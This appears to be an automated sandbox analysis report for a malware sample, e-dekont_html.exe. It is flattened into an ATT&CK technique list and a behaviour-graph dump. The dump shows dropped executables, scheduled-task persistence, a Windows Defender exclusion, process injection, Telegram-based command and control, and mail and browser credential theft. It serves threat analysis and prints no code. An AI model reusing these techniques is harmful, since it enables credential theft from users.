                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                System Network Configuration Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1608223 Sample: e-dekont_html.exe Startdate: 06/02/2025 Architecture: WINDOWS Score: 100 51 reallyfreegeoip.org 2->51 53 api.telegram.org 2->53 55 2 other IPs or domains 2->55 63 Suricata IDS alerts for network traffic 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 73 14 other signatures 2->73 9 e-dekont_html.exe 7 2->9         started        13 HvgRSvNGGXnNtV.exe 5 2->13         started        signatures3 69 Tries to detect the country of the analysis system (by using the IP) 51->69 71 Uses the Telegram API (likely for C&C communication) 53->71 process4 file5 43 C:\Users\user\AppData\...\HvgRSvNGGXnNtV.exe, PE32 9->43 dropped 45 C:\...\HvgRSvNGGXnNtV.exe:Zone.Identifier, ASCII 9->45 dropped 47 C:\Users\user\AppData\Local\...\tmpE95B.tmp, XML 9->47 dropped 49 C:\Users\user\...\e-dekont_html.exe.log, ASCII 9->49 dropped 75 Uses schtasks.exe or at.exe to add and modify task schedules 9->75 77 Adds a directory exclusion to Windows Defender 9->77 79 Injects a PE file into a foreign processes 9->79 15 powershell.exe 23 9->15         started        18 powershell.exe 23 9->18         started        20 e-dekont_html.exe 15 2 9->20         started        23 schtasks.exe 1 9->23         started        81 Multi AV Scanner detection for dropped file 13->81 83 Machine Learning detection for dropped file 13->83 25 HvgRSvNGGXnNtV.exe 13->25         started        27 schtasks.exe 13->27         started        29 HvgRSvNGGXnNtV.exe 13->29         started        signatures6 process7 dnsIp8 85 Loading BitLocker PowerShell Module 15->85 31 conhost.exe 15->31         started        33 conhost.exe 18->33         started        35 WmiPrvSE.exe 18->35         started        57 checkip.dyndns.com 132.226.8.169, 49710, 49735, 49742 UTMEMUS United States 20->57 59 api.telegram.org 149.154.167.220, 443, 49827, 49861 TELEGRAMRU United Kingdom 20->59 61 reallyfreegeoip.org 104.21.96.1, 443, 49722, 49728 CLOUDFLARENETUS United States 20->61 37 conhost.exe 23->37         started        87 Tries to steal Mail credentials (via file / registry access) 25->87 89 Tries to harvest and steal browser information (history, passwords, etc) 25->89 39 conhost.exe 27->39         started        signatures9 process10 process11 41 conhost.exe 31->41         started       

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.